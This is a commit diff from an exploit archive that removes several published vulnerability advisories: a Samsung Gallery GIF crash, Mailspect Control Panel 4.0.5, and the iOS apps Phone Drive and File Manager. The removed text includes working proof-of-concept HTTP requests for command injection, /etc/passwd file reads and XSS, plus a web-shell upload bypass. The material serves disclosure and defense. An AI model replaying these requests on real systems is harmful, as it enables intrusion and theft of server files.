DB: 2016-07-11
This commit is contained in:
parent
c9a818eb76
commit
76bc268c80
27 changed files with 441 additions and 1556 deletions
|
@ -1,31 +0,0 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=500
|
||||
|
||||
There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.
|
||||
|
||||
D/skia (10905): GIF - Parse error
|
||||
D/skia (10905): --- decoder->decode returned false
|
||||
F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
|
||||
I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<<
|
||||
I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
|
||||
I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c
|
||||
I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048
|
||||
I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758
|
||||
I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f
|
||||
I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00
|
||||
I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001
|
||||
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
|
||||
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
|
||||
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
|
||||
I/DEBUG ( 2958):
|
||||
I/DEBUG ( 2958): backtrace:
|
||||
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
|
||||
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)
|
||||
I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
|
||||
I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
|
||||
|
||||
To reproduce, download the file and open it in Gallery
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/2889/exploit
|
||||
source: http://www.securityfocus.com/bid/2889/info
|
||||
|
||||
DCShop is a GCI-based ecommerce system from DCScripts.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/2889/exploit
|
||||
source: http://www.securityfocus.com/bid/2889/info
|
||||
|
||||
DCShop is a GCI-based ecommerce system from DCScripts.
|
||||
|
||||
|
|
|
@ -1,147 +0,0 @@
|
|||
Document Title:
|
||||
============
|
||||
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
|
||||
|
||||
Release Date:
|
||||
===========
|
||||
June 21, 2014
|
||||
|
||||
Product & Service Introduction:
|
||||
========================
|
||||
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
|
||||
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
|
||||
|
||||
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
|
||||
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
|
||||
content filers and reputation engines.
|
||||
|
||||
Abstract Advisory Information:
|
||||
=======================
|
||||
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
|
||||
4.0.5 web application.
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
=========================
|
||||
May 4, 2014 : Contact with Vendor
|
||||
May 16, 2014 : Vendor Response
|
||||
June 21, 2014 : Public Disclosure
|
||||
|
||||
Discovery Status:
|
||||
=============
|
||||
Published
|
||||
|
||||
Affected Product(s):
|
||||
===============
|
||||
Multilayered Email Security & Archive for Gateways, MTA's & Servers
|
||||
Product: Mailspect Control Panel 4.0.5
|
||||
Other versions may be affected.
|
||||
|
||||
Exploitation Technique:
|
||||
==================
|
||||
RCE: Remote, Authenticated
|
||||
AFR: Remote, Authenticated
|
||||
XSS: Remote, Unauthenticated
|
||||
|
||||
Severity Level:
|
||||
===========
|
||||
High
|
||||
|
||||
Technical Details & Description:
|
||||
========================
|
||||
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
|
||||
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
|
||||
"status_info.cgi?group=default" page.
|
||||
Other parameters with the suffix "_cmd" are probably vulnerable.
|
||||
|
||||
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
|
||||
file name like "/etc/passwd" will cause the file's content's disclosure.
|
||||
|
||||
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
|
||||
will cause the file's content's disclosure.
|
||||
|
||||
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
|
||||
the Javascript code's execution.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
==================
|
||||
Proof of Concept RCE Request:
|
||||
|
||||
POST /system_module.cgi HTTP/1.1
|
||||
Host: 192.168.41.142:20001
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
|
||||
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
|
||||
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 1282
|
||||
|
||||
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
|
||||
|
||||
2. Proof of Concept AFR Request 1:
|
||||
|
||||
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
|
||||
Host: 192.168.41.142:20001
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
|
||||
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
|
||||
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
|
||||
Connection: keep-alive
|
||||
|
||||
3. Proof of Concept AFR Request 2:
|
||||
|
||||
POST /monitor_manage_logs.cgi HTTP/1.1
|
||||
Host: 192.168.41.142:20001
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
|
||||
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
|
||||
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 85
|
||||
|
||||
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
|
||||
|
||||
4. Proof of Concept XSS Request:
|
||||
|
||||
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
|
||||
Host: 192.168.41.142:20001
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
|
||||
Solution Fix & Patch:
|
||||
================
|
||||
XSS will be patched at version 4.0.7
|
||||
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
|
||||
|
||||
Security Risk:
|
||||
==========
|
||||
The risk of the vulnerabilities above estimated as high.
|
||||
|
||||
Credits & Authors:
|
||||
==============
|
||||
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ
|
||||
|
||||
Disclaimer & Information:
|
||||
===================
|
||||
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
|
||||
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
|
||||
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
|
||||
|
||||
Domain: www.bga.com.tr/advisories.html
|
||||
Social: twitter.com/bgasecurity
|
||||
Contact: bilgi@bga.com.tr
|
||||
|
||||
Copyright © 2014 | BGA Security
|
|
@ -1,311 +0,0 @@
|
|||
Document Title:
|
||||
===============
|
||||
Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1168
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2013-12-11
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1168
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.6
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Phone Drive allows you to store, view and manage files on your iPhone or iPad. You can connect to Phone Drive from any Mac or
|
||||
PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. Phone Drive
|
||||
features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most
|
||||
of the file operations: like delete, move, copy, email, share, zip, unzip and more.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/de/app/phone-drive/id431033044 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Eigthythree Phone Drive v4.1.1 iOS mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2013-12-11: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Eightythree Technologies
|
||||
Product: Phone Drive - Mobile Application 4.1.1
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
1.1
|
||||
A local command/path injection web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
|
||||
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.
|
||||
|
||||
The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are
|
||||
able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector
|
||||
in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high
|
||||
with a cvss (common vulnerability scoring system) count of 7.0(+)|(-)7.1.
|
||||
|
||||
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
|
||||
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
|
||||
commands or unauthorized path requests.
|
||||
|
||||
Request Method(s):
|
||||
[+] [GET]
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] devicename
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir List - [Header]
|
||||
|
||||
|
||||
1.2
|
||||
A local file/path include web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
|
||||
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the web-application.
|
||||
|
||||
The remote file include web vulnerability is located in the vulnerable filename value of the file dir list index module (web interface).
|
||||
Remote attackers can manipulate the filename value in the POST method request of the file upload form to cpmpromise the mobile application.
|
||||
Remote attackers are able to include own local files by usage of the file upload module. The attack vector is persistent and the request
|
||||
method is POST. The file include execute occcurs in the main file dir index list. The security risk of the local file include web
|
||||
vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
|
||||
|
||||
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
|
||||
Successful exploitation of the local web vulnerability results in application or device compromise by unauthorized local file include attacks.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] File Upload
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:80)
|
||||
|
||||
|
||||
|
||||
1.3
|
||||
An arbitrary file upload web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
|
||||
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
|
||||
|
||||
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with
|
||||
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
|
||||
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
|
||||
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
|
||||
estimated as high with a cvss (common vulnerability scoring system) count of 6.6(+).
|
||||
|
||||
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
|
||||
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
|
||||
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] File Upload
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename (multiple extensions)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:80)
|
||||
|
||||
|
||||
1.4
|
||||
A persistent input validation web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
|
||||
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
|
||||
|
||||
The persistent input validation vulnerability is located in the foldername (path) value of the folder/path create web-application module.
|
||||
Remote attackers can inject own malicious script codes as payload to the create folder (path) input field. After the client-side inject
|
||||
in the POSt method request the payload will be saved and the vector turns into a persistent attack. The persistent execute occurs in the
|
||||
file dir index- or sub category folder list (http://localhost:8080). Attacker can also inject the script code by the rename of an
|
||||
exsisting issue. The second execute occurs in the delete notification popup box of the item index list. The security risk of the persistent
|
||||
input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.9(+).
|
||||
|
||||
Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
|
||||
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
|
||||
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Create Folder
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] foldername (path)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:80)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
1.1
|
||||
The local command inject web vulnerability can be exploited by local attackers with physical restricted device access and without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
|
||||
|
||||
PoC: DeviceName - Index File Dir List
|
||||
|
||||
<tr>
|
||||
<td><a href="http://localhost:80/"><img src="Phone%20Drive%20-%20devicename_files/webicon.png" id="headerImg" height="57" width="57"></a></td>
|
||||
<td><h2>device bkm>"<<>"<../[LOCAL COMMAND/PATH INJECT WEB VULNERABILITY!]"></h2></td>
|
||||
<td width="170" align="center"><a
|
||||
href="http://www.eightythreetech.com" target="_blank"><img
|
||||
src="/webroot/moreapps.png"/></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
1.2
|
||||
The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account and user interaction.
|
||||
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below.
|
||||
|
||||
PoC:
|
||||
<tr class="c"><td class="e"><input name="selection" value="[LOCAL FILE INCLUDE VULNERABILITY!]" type="checkbox"></td>
|
||||
<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" height="20"
|
||||
width="20"></a></td><td class="n"><a href="[LOCAL FILE INCLUDE VULNERABILITY!]">[LOCAL FILE INCLUDE VULNERABILITY!]</a></td><td class="m">
|
||||
17.09.2015 18:07</td><td class="s">24.7 KB</td><td class="k">Safari Web Archive</td><td class="e">
|
||||
<a href="#" title="Download file" onclick="downloadFile("[LOCAL FILE INCLUDE VULNERABILITY!]");">
|
||||
<img src="/webroot/webdownload.png" height="15" width="15"></a></td><td class="e"><a href="#"
|
||||
title="Rename file" onclick="modalPopup("Help.webarchive", 0, 1);">
|
||||
<img src="/webroot/webrename.png" height="15" width="15"></a></td><td class="e">
|
||||
<a href="#" title="Delete file" onclick="modalPopup("Help.webarchive", 2, 1);">
|
||||
<img src="/webroot/webdelete.png" height="15" width="15"></a></td></tr>
|
||||
|
||||
|
||||
|
||||
1.3
|
||||
The arbitrary file upload and restricted upload bypass web vulnerability can be exploited by remote attackers without user interaction
|
||||
or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information
|
||||
and steps below.
|
||||
|
||||
|
||||
PoC Session Logs: qqfile
|
||||
|
||||
Status: 200 OK
|
||||
POST http://localhost:80/qqfile=arbitrary-file-upload.png.txt.iso.js.html.php.jpg
|
||||
Load Flags[LOAD_BYPASS_CACHE ]
|
||||
Content Size[unknown] Mime Type[unknown]
|
||||
|
||||
Request Headers:
|
||||
Host[192.168.2.106]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[en-US,en;q=0.5]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
X-Requested-With[XMLHttpRequest]
|
||||
X-File-Name[arbitrary-file-upload.png.txt.iso.js.html.php.jpg]
|
||||
Content-Type[application/octet-stream]
|
||||
Referer[http://192.168.2.106/]
|
||||
Content-Length[98139]
|
||||
Post Data:
|
||||
POST_DATA[‰PNG
|
||||
|
||||
|
||||
|
||||
1.4
|
||||
The persistent input validation web vulnerability can be exploited by remote attackers without privileged web application user account
|
||||
and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
|
||||
|
||||
|
||||
PoC: Creat Folder - Index File Dir List & Sub Category List
|
||||
|
||||
<tr class="c"><td class="e"><input name="selection"
|
||||
value="%3E%22%3Cx%20src=a%3E" type="checkbox"></td><td class="i">
|
||||
<a href="http://localhost/%3E%22%3Ciframe%20src=a%3E/"><img src="Phone%20Drive%20-%20pathname_files/folder.png"
|
||||
height="20" width="20"></a></td><td class="n"><a href="http://localhost/%3E%22%3Cx%3E/">
|
||||
>"<[PERSISTENT INJECTED SCRIPT CODE!]"></a></td><td
|
||||
class="m">11.12.2013 13:29</td><td
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
1.1
|
||||
The first vulnerability can be patched by a secure encode of the devicename value in the ehader section of the index module.
|
||||
|
||||
1.2 - 1.3
|
||||
Restrict the filename input and parse the context with a filter mechanism. Disallow multiple file extensions and implement
|
||||
a own exception-handling to prevent arbitrary file uploads or restricted file uploads.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
1.1
|
||||
The security risk of the local command inject web vulnerability is estimated as high(-).
|
||||
|
||||
1.2 - 1.3
|
||||
The security risk of the local file include web vulnerability via file and folder name value is estimated as high(+).
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||||
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||||
or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||||
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||||
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright <20> 2013 | Vulnerability Laboratory [Evolution Security]
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||
DOMAIN: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
|
|
@ -1,214 +0,0 @@
|
|||
Document Title:
|
||||
===============
|
||||
File Manager v4.2.10 iOS - Code Execution Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1343
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2014-10-21
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1343
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
9
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
|
||||
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
|
||||
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
|
||||
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
|
||||
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
|
||||
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2014-10-21: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
DevelSoftware LTD
|
||||
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Critical
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
|
||||
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
|
||||
execution vulnerability in the wifi interface.
|
||||
|
||||
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
|
||||
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
|
||||
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
|
||||
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
|
||||
and the request method to inject is GET.
|
||||
|
||||
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
|
||||
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
|
||||
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
|
||||
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Create Folder
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] createdir?path=(name)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Wifi Interface (index.html)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881]
|
||||
2. Start the app and push in the left corner the wifi transfer button
|
||||
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
|
||||
4. Now, inject own code as payload by usage of the create folder input field
|
||||
Note: The input field requests the path value directly via GET method request without secure parse or encode
|
||||
5. The code execution occurs directly after the inject in the index.html file of the web interface
|
||||
6. Successful reproduce of the security vulnerability!
|
||||
|
||||
|
||||
PoC: index.html (Name) [createdir?path=]
|
||||
|
||||
<fieldset class="buttonsFieldset">
|
||||
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()" type="button">
|
||||
